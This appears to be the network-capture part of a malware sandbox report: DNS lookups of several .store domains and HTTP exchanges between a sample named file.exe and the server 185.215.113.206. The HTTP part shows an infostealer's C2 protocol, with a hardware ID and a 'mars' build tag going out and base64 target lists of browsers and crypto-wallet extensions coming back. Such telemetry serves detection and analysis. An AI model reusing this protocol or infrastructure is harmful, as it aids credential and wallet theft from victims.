Nov 10, 2024 04:56:31.020558119 CET	1.1.1.1	192.168.2.5	0x466a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.020558119 CET	1.1.1.1	192.168.2.5	0x466a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.020809889 CET	1.1.1.1	192.168.2.5	0x9e6e	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:56:38.279057026 CET	1.1.1.1	192.168.2.5	0x8c35	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.307347059 CET	1.1.1.1	192.168.2.5	0x25fc	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.336220980 CET	1.1.1.1	192.168.2.5	0x9925	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.361685038 CET	1.1.1.1	192.168.2.5	0xf496	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.386151075 CET	1.1.1.1	192.168.2.5	0x1c54	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.409617901 CET	1.1.1.1	192.168.2.5	0x4703	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:53.205236912 CET	1.1.1.1	192.168.2.5	0xc170	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:53.205926895 CET	1.1.1.1	192.168.2.5	0xee3f	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025254011 CET	1.1.1.1	192.168.2.5	0xd2da	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025254011 CET	1.1.1.1	192.168.2.5	0xd2da	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025254011 CET	1.1.1.1	192.168.2.5	0xd2da	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025254011 CET	1.1.1.1	192.168.2.5	0xd2da	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025362015 CET	1.1.1.1	192.168.2.5	0xd74d	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025362015 CET	1.1.1.1	192.168.2.5	0xd74d	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025362015 CET	1.1.1.1	192.168.2.5	0xd74d	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025645971 CET	1.1.1.1	192.168.2.5	0xe3ae	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.025645971 CET	1.1.1.1	192.168.2.5	0xe3ae	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.044662952 CET	1.1.1.1	192.168.2.5	0x929a	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:56.171070099 CET	1.1.1.1	192.168.2.5	0x3966	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:56.171083927 CET	1.1.1.1	192.168.2.5	0xb235	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 10, 2024 04:56:57.207998037 CET	1.1.1.1	192.168.2.5	0x362f	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.219384909 CET	1.1.1.1	192.168.2.5	0x6cd8	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.219384909 CET	1.1.1.1	192.168.2.5	0x6cd8	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.219384909 CET	1.1.1.1	192.168.2.5	0x6cd8	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:57.480602980 CET	1.1.1.1	192.168.2.5	0x3907	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.480602980 CET	1.1.1.1	192.168.2.5	0x3907	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.480602980 CET	1.1.1.1	192.168.2.5	0x3907	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.480602980 CET	1.1.1.1	192.168.2.5	0x3907	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:57.481268883 CET	1.1.1.1	192.168.2.5	0x39a8	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:57.481268883 CET	1.1.1.1	192.168.2.5	0x39a8	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:01.414397001 CET	1.1.1.1	192.168.2.5	0x5166	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:01.431322098 CET	1.1.1.1	192.168.2.5	0x7cbd	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:02.818345070 CET	1.1.1.1	192.168.2.5	0xf1e1	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:02.871493101 CET	1.1.1.1	192.168.2.5	0x307f	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:05.302680969 CET	1.1.1.1	192.168.2.5	0x7248	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.329108000 CET	1.1.1.1	192.168.2.5	0x64ca	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.356338978 CET	1.1.1.1	192.168.2.5	0xb721	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.380965948 CET	1.1.1.1	192.168.2.5	0xa96d	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.404397011 CET	1.1.1.1	192.168.2.5	0x7bd1	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.429617882 CET	1.1.1.1	192.168.2.5	0x89d5	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:06.559834957 CET	1.1.1.1	192.168.2.5	0x4e0f	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:06.577019930 CET	1.1.1.1	192.168.2.5	0x19a	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:57:30.361994982 CET	1.1.1.1	192.168.2.5	0xfc27	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:57:30.362009048 CET	1.1.1.1	192.168.2.5	0xc144	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.362009048 CET	1.1.1.1	192.168.2.5	0xc144	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.364548922 CET	1.1.1.1	192.168.2.5	0xe9e7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.364548922 CET	1.1.1.1	192.168.2.5	0xe9e7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.364737034 CET	1.1.1.1	192.168.2.5	0x152a	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:57:30.365346909 CET	1.1.1.1	192.168.2.5	0xa7b8	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:57:30.365542889 CET	1.1.1.1	192.168.2.5	0x97de	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.365542889 CET	1.1.1.1	192.168.2.5	0x97de	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:34.595377922 CET	1.1.1.1	192.168.2.5	0xb1d3	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:57.468044996 CET	1.1.1.1	192.168.2.5	0x7ed5	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:58:10.097831964 CET	1.1.1.1	192.168.2.5	0xdbb2	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:58:27.219548941 CET	1.1.1.1	192.168.2.5	0xbce	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:14.046622992 CET	1.1.1.1	192.168.2.5	0xa5c0	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:40.559365034 CET	1.1.1.1	192.168.2.5	0x830d	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:40.559365034 CET	1.1.1.1	192.168.2.5	0x830d	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:40.559663057 CET	1.1.1.1	192.168.2.5	0x1c29	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:59:59.672533989 CET	1.1.1.1	192.168.2.5	0xd87d	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:59.672533989 CET	1.1.1.1	192.168.2.5	0xd87d	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:59.672547102 CET	1.1.1.1	192.168.2.5	0x5230	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 05:00:00.484282017 CET	1.1.1.1	192.168.2.5	0xfb03	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 05:00:00.484683990 CET	1.1.1.1	192.168.2.5	0x1e00	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.206	80	1868	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:54:58.099654913 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:54:59.006438017 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:54:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:54:59.009727955 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 2d 2d 0d 0a Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="build"mars------DBKFHJEBAAEBGDGDBFBG--
Nov 10, 2024 04:54:59.307391882 CET	407	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:54:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 47 4d 32 4e 32 59 32 4d 44 64 69 5a 44 56 6a 4d 44 4a 6b 59 54 56 6d 4d 6a 49 31 5a 6a 6c 6a 4f 47 59 34 4e 6d 52 6d 59 7a 4d 79 4d 44 52 6a 59 32 51 7a 4d 44 6b 31 4d 6d 5a 6c 5a 6d 59 79 4d 6a 49 7a 4f 54 67 7a 4d 57 4d 78 59 7a 67 34 5a 44 49 35 4d 54 55 7a 5a 47 4e 68 4e 54 51 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MGM2N2Y2MDdiZDVjMDJkYTVmMjI1ZjljOGY4NmRmYzMyMDRjY2QzMDk1MmZlZmYyMjIzOTgzMWMxYzg4ZDI5MTUzZGNhNTQ0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 10, 2024 04:54:59.308687925 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBG Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"browsers------HDAFHIDGIJKJKECBGDBG--
Nov 10, 2024 04:54:59.589135885 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:54:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 10, 2024 04:54:59.589150906 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 10, 2024 04:54:59.590853930 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="message"plugins------IDHJEBGIEBFIJKEBFBFH--
Nov 10, 2024 04:54:59.871685982 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:54:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 10, 2024 04:54:59.871700048 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
